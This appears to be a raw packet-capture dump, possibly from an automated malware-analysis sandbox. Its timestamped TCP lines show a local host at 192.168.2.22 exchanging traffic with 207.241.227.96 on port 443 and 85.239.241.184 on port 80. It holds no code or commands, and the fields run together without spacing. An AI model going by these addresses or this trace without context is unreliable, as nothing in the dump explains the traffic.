                                        Sep 9, 2024 17:34:40.974770069 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.974797964 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.975168943 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.975199938 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.975230932 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.975236893 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.975266933 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.975343943 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.975368977 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.975399971 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.975406885 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.975435972 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:41.021265984 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.021300077 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.021344900 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:41.021368980 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.021384954 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:41.021384954 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:41.039072037 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.039103031 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.039222002 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:41.039246082 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.039277077 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:41.039580107 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.039611101 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.039645910 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:41.039654970 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.039683104 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:41.043035984 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:41.060978889 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.061007023 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.061156034 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:41.061156034 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:41.061181068 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.061413050 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.061443090 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.061482906 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:41.061491966 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.061512947 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:41.062036991 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.062062025 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.062092066 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:41.062098980 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.062125921 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:41.062572002 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.062607050 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.062638044 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:41.062644958 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.062670946 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:41.062670946 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:41.062947989 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.062972069 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.063019037 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:41.063019037 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:41.063025951 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.108196020 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.108237028 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.108289003 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:41.108315945 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.108350992 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:41.125638962 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.125667095 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.125703096 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:41.125710964 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.125741005 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:41.126460075 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.126493931 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.126527071 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:41.126535892 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.126568079 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:41.147595882 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.147623062 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.147674084 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:41.147674084 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:41.147684097 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.147905111 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.147932053 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.147964001 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:41.147970915 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.148000002 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:41.148464918 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.148489952 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.148525953 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:41.148533106 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.148561001 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:41.148895025 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.148922920 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.148950100 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:41.148957014 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.148982048 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:41.149135113 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.149158955 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.149188995 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:41.149195910 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.149223089 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:41.194912910 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.194951057 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.195018053 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:41.195018053 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:41.195034027 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.200639963 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:41.212374926 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.212429047 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.212443113 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:41.212454081 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.212474108 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:41.212522030 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:41.212625980 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:41.216636896 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:41.328748941 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:41.333679914 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:41.333766937 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:41.333823919 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:41.338665962 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:41.832490921 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:41.832624912 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:41.832636118 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:41.832647085 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:41.832673073 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:41.832683086 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:41.832693100 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:41.832696915 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:41.832703114 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:41.832711935 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:41.832722902 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:41.832726002 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:41.832747936 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:41.837614059 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:41.837635994 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:41.837644100 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:41.837675095 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:41.920449018 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:41.920468092 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:41.920486927 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:41.920497894 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:41.920507908 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:41.920519114 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:41.920531034 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:41.920536041 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:41.920564890 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:41.920654058 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:41.920665026 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:41.920674086 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:41.920684099 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:41.920711994 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:41.920734882 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:41.920816898 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:41.920826912 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:41.920861959 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:41.920872927 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:41.920882940 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:41.920922041 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:41.921415091 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:41.921427965 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:41.921437025 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:41.921458960 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:41.921463966 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:41.921483040 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:41.921519995 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:41.925384998 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:41.925448895 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:41.925460100 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:41.925472021 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:41.925482035 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:41.925494909 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:41.925527096 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.017086983 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.017108917 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.017116070 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.017121077 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.017127037 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.017132044 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.017143011 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.017183065 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.017205954 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.017209053 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.017299891 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.017312050 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.017350912 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.017545938 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.017556906 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.017569065 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.017580032 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.017586946 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.017602921 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.017613888 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.017621994 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.017626047 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.017637968 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.017646074 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.017648935 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.017661095 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.017672062 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.017700911 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.018338919 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.018359900 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.018372059 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.018395901 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.018476963 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.018490076 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.018500090 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.018511057 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.018522024 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.018537045 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.018641949 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.018654108 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.018665075 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.018686056 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.019316912 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.019332886 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.019344091 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.019361019 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.019370079 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.019399881 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.019411087 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.019421101 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.019431114 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.019448042 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.019537926 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.019548893 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.019560099 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.019576073 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.020287991 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.020298958 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.020308018 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.020330906 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.020394087 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.020407915 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.020443916 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.022180080 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.022226095 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.022268057 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.092864037 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.092891932 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.092904091 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.092915058 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.092928886 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.092938900 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.092959881 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.092989922 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.103888988 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.103928089 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.103940010 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.104001999 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.104015112 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.104075909 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.104103088 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.104257107 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.104269028 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.104281902 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.104291916 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.104302883 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.104305983 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.104315042 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.104326010 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.104377985 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.104401112 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.104412079 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.104430914 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.104449034 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.104461908 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.104464054 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.104473114 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.104485035 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.104496002 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.104509115 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.104512930 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.104532003 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.104707956 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.104720116 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.104729891 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.104742050 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.104753971 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.104756117 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.104765892 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.104775906 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.104809999 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.105115891 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.105138063 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.105153084 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.105187893 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.105267048 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.105279922 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.105289936 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.105304003 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.105308056 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.105330944 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.105407953 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.105418921 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.105431080 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.105443001 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.105449915 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.105479002 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.110647917 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.110661030 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.110671997 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.110685110 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.110721111 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.110733032 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.110743999 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.110755920 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.110784054 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.110784054 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.110784054 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.110821962 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.110821962 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.110833883 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.110846043 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.110872030 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.179904938 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.179955006 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.180212021 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.180222988 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.180233002 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.180241108 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.180250883 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.180253983 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.180270910 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.180347919 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.180360079 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.180394888 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.190737009 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.190753937 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.190766096 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.190777063 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.190787077 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.190788984 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.190800905 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.190823078 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.190846920 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.190856934 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.190859079 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.190867901 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.190877914 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.190893888 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.190916061 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.191106081 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.191116095 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.191126108 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.191134930 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.191145897 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.191153049 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.191179991 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.191251993 CEST804917185.239.241.184192.168.2.22
